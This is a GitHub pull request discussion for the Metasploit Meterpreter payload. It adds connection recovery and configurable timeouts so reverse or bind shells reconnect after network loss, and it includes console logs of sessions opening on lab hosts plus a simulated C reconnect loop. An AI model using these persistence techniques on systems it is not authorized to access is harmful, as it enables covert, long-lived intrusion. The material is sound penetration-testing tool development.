rapid7 / meterpreter

THIS REPO IS OBSOLETE. USE https://github.com/rapid7/metasploit-payloads INSTEAD

Connection recovery and POSIX transport switching #151

Closed OJ closed 9 years ago

OJ commented 9 years ago

This PR contains a stack of code that is another stepping stone towards totally resilient and stable shells. The goal of this work is to allow Meterpreter to "recover" communications in the event of network failures or disconnects.

All of the HTTP related timeouts are now available in TCP comms too (session expiry, comms timeout, retry total and retry wait). These can all be set/get on the fly as well so that the tester/attacker has full control. This also means that session expiry can be extended (which we weren't able to do before).

The code includes:

To be clear, the word "recovery" in this case means "restarting communications in the way it was done previously". That means it'll callback again if it's reverse, or it'll bind again if it's bind. If https is required, that's what it'll be.

This work relies on new bind stagers which are still WIP in the MSF repo. The MSF side of this PR can be found here: https://github.com/rapid7/metasploit-framework/pull/5214

In essence you should be able to kill off comms (or MSF totally). Restart MSF, and have things "just work".

NOTE: This change means that TCP payloads behave like HTTP in that calling exit -y no longer kills off communications. If you want sessions to die, you have to tell them! (or wait for them to expire).

POSIX has an issue where the timeouts can't be patched by MSF on the fly because the strings that are used for replacement aren't visible due to gzip compression. This is something I'll be getting help from Brent on. For now they have "sane defaults" and they can be modified on the fly.

Keen eyes and critique needed.

Sample run:

Windows x64:

msf exploit(handler) > run

[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Sending stage (1124864 bytes) to 10.1.10.35
[*] Meterpreter session 1 opened (10.1.10.40:8000 -> 10.1.10.35:49285) at 2015-04-21 20:06:06 +1000

meterpreter > background
msf exploit(handler) > exit -y
$ ./msfconsole -x 'set payload windows/x64/meterpreter_reverse_tcp; run'
[*] Starting the Metasploit Framework console...|
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %  %%%%%%%%   %%%%%%%%%%% http://metasploit.pro %%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%
%%%%  %%  %%  %      %%      %%    %%%%%      %    %%%%  %%   %%%%%%       %%
%%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%  %%%%%
%%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%
%%%%%%%%%%%% %%%%     %%%%%    %%  %%   %    %%  %%%%  %%%%   %%%   %%%     %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

       =[ metasploit v4.11.0-dev [core:4.11.0.pre.dev api:1.0.0]]
+ -- --=[ 1445 exploits - 822 auxiliary - 229 post        ]
+ -- --=[ 378 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

payload => windows/x64/meterpreter_reverse_tcp
[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (10.1.10.40:8000 -> 10.1.10.35:49286) at 2015-04-21 20:08:14 +1000

meterpreter > sysinfo
Computer        : WIN-S45GUQ5KGVK
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/win64
meterpreter > exit

POSIX:

msf exploit(handler) > run

[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1564672 bytes) to 10.1.10.40
[*] Meterpreter session 2 opened (10.1.10.40:8000 -> 10.1.10.40:49080) at 2015-04-21 20:15:57 +1000

meterpreter > sysinfo
Computer     : ropchain
OS           : Linux ropchain 3.19.2-201.fc21.x86_64 #1 SMP Tue Mar 24 03:08:23 UTC 2015 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > background
[*] Backgrounding session 2...
msf exploit(handler) > exit -y
$ ./msfconsole
[*] Starting the Metasploit Framework console...|
Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`

                             http://metasploit.pro

       =[ metasploit v4.11.0-dev [core:4.11.0.pre.dev api:1.0.0]]
+ -- --=[ 1445 exploits - 822 auxiliary - 229 post        ]
+ -- --=[ 378 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf exploit(handler) > run

[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1564672 bytes) to 10.1.10.40
[*] Meterpreter session 1 opened (10.1.10.40:8000 -> 10.1.10.40:49092) at 2015-04-21 20:16:31 +1000

meterpreter > sysinfo
Computer     : ropchain
OS           : Linux ropchain 3.19.2-201.fc21.x86_64 #1 SMP Tue Mar 24 03:08:23 UTC 2015 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > exit

Timeout extension:

meterpreter > get_timeouts 
Session Expiry  : @ 2015-05-05 21:25:28
Comm Timeout    : 300 seconds
Retry Total Time: 3600 seconds
Retry Wait Time : 10 seconds
meterpreter > set_timeouts 
Usage: set_timeouts [options]

Set the current timeout options.
Any or all of these can be set at once.

OPTIONS:

    -c <opt>  Comms timeout (seconds)
    -h        Help menu
    -t <opt>  Retry total time (seconds)
    -w <opt>  Retry wait time (seconds)
    -x <opt>  Expiration timeout (seconds)

meterpreter > set_timeouts -t 10000
Session Expiry  : @ 2015-05-06 13:49:42
Comm Timeout    : 300 seconds
Retry Total Time: 10000 seconds
Retry Wait Time : 10 seconds
meterpreter > set_timeouts -x 11111111111
Session Expiry  : @ 2095-03-13 03:19:21
Comm Timeout    : 300 seconds
Retry Total Time: 10000 seconds
Retry Wait Time : 10 seconds

Verification
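The reconnect behaviour the PR description lays out (retry every "retry wait" seconds, stop after "retry total" seconds, never outlive the session expiry, and treat a transport as dead once the comms timeout of silence has passed) is easiest to reason about as a small loop. The following is an added example in C written for this page; it is not the Meterpreter transport code from this PR. The struct, enum and function names, and the simulated clock/handler, are assumptions made for illustration; the default values (10 s wait, 3600 s total, 300 s comms timeout) are the ones shown in the `get_timeouts` output above.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Added illustration of the four timeouts this PR puts on TCP transports.
 * Names and layout are assumed for the example; they are not Meterpreter's. */
typedef struct {
    uint64_t session_expiry; /* absolute second after which the session must die */
    uint32_t comm_timeout;   /* seconds of silence before the transport counts as dead */
    uint32_t retry_total;    /* total seconds to keep retrying a dead transport */
    uint32_t retry_wait;     /* seconds between retries */
} timeouts_t;

typedef enum { RECOVERED, GAVE_UP_RETRY_TOTAL, GAVE_UP_EXPIRED } recover_result_t;

/* Callbacks so the loop can run without a network: "connect" stands for
 * calling back again (reverse) or binding again (bind), exactly as before. */
typedef bool (*connect_fn)(void *ctx);
typedef uint64_t (*clock_fn)(void *ctx);
typedef void (*sleep_fn)(void *ctx, uint32_t seconds);

/* Comms timeout: the transport is dead once nothing has arrived for comm_timeout seconds. */
bool comms_timed_out(uint32_t comm_timeout, uint64_t last_rx, uint64_t now)
{
    return now - last_rx >= comm_timeout;
}

/* Recovery loop: retry every retry_wait seconds, give up after retry_total
 * seconds of trying, and never outlive the session expiry. */
recover_result_t recover_transport(const timeouts_t *t, connect_fn connect,
                                   clock_fn now, sleep_fn sleep_s, void *ctx)
{
    uint64_t start = now(ctx);
    for (;;) {
        uint64_t cur = now(ctx);
        if (cur >= t->session_expiry)
            return GAVE_UP_EXPIRED;       /* session expired: stop trying */
        if (cur - start >= t->retry_total)
            return GAVE_UP_RETRY_TOTAL;   /* retry budget spent: stop trying */
        if (connect(ctx))
            return RECOVERED;             /* handler is back: carry on */
        sleep_s(ctx, t->retry_wait);
    }
}

/* Simulated environment (constructed for the example): a clock that only
 * advances while sleeping, and a handler that comes back at a chosen time. */
typedef struct {
    uint64_t clock;
    uint64_t handler_up_at; /* UINT64_MAX: the handler never returns */
    unsigned connects;      /* number of callback/bind attempts made */
} sim_t;

static bool sim_connect(void *c) { sim_t *s = c; s->connects++; return s->clock >= s->handler_up_at; }
static uint64_t sim_now(void *c) { return ((sim_t *)c)->clock; }
static void sim_sleep(void *c, uint32_t secs) { ((sim_t *)c)->clock += secs; }

/* Run one scenario from t=0; report the outcome and how many attempts it took. */
recover_result_t run_case(uint64_t handler_up_at, uint64_t session_expiry,
                          uint32_t retry_total, uint32_t retry_wait, unsigned *attempts)
{
    sim_t sim = { 0, handler_up_at, 0 };
    timeouts_t t = { session_expiry, 300, retry_total, retry_wait };
    recover_result_t r = recover_transport(&t, sim_connect, sim_now, sim_sleep, &sim);
    if (attempts) *attempts = sim.connects;
    return r;
}

unsigned attempts_for(uint64_t handler_up_at, uint64_t session_expiry,
                      uint32_t retry_total, uint32_t retry_wait)
{
    unsigned n = 0;
    run_case(handler_up_at, session_expiry, retry_total, retry_wait, &n);
    return n;
}

int main(void)
{
    static const char *names[] = { "RECOVERED", "GAVE_UP_RETRY_TOTAL", "GAVE_UP_EXPIRED" };
    unsigned n;
    recover_result_t r;
    /* Defaults from the transcript: retry every 10 s for up to 3600 s; MSF restarted after 35 s. */
    r = run_case(35, 1000000, 3600, 10, &n);
    printf("handler back at 35s : %s after %u attempts\n", names[r], n);
    /* exit -y and never restart: the payload keeps retrying until the retry budget is spent. */
    r = run_case(UINT64_MAX, 1000000, 60, 10, &n);
    printf("handler never back  : %s after %u attempts\n", names[r], n);
    /* A short session expiry wins over a long retry budget. */
    r = run_case(UINT64_MAX, 25, 3600, 10, &n);
    printf("expiry at 25s       : %s after %u attempts\n", names[r], n);
    return 0;
}
```

The second scenario is the behaviour the NOTE in the description warns about: after `exit -y` the TCP payload does not go away, it sits in this loop until the retry total elapses or the session expires, which is why a session you want dead has to be told to die. The third scenario shows why extending expiry with `set_timeouts -x` matters: expiry is checked before the retry budget, so a short expiry cuts recovery off no matter how generous the retry total is.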

metasploit-public-bot commented 9 years ago

Test PASSED. Refer to this link for build results (access rights to CI server needed): https://ci.metasploit.com//job/GPR-MeterpreterWin/186/

bcook-r7 commented 9 years ago

I have a few more things to test, but want to merge this (plus a couple of minor tweaks) so I can test with new bins as well.

OJ commented 9 years ago

Thanks @bcook-r7. I apologise in advance, because the next couple of PRs are probably going to trample on a lot of this stuff.

Hey ho, gotta be done!

OJ commented 9 years ago

Thanks mate.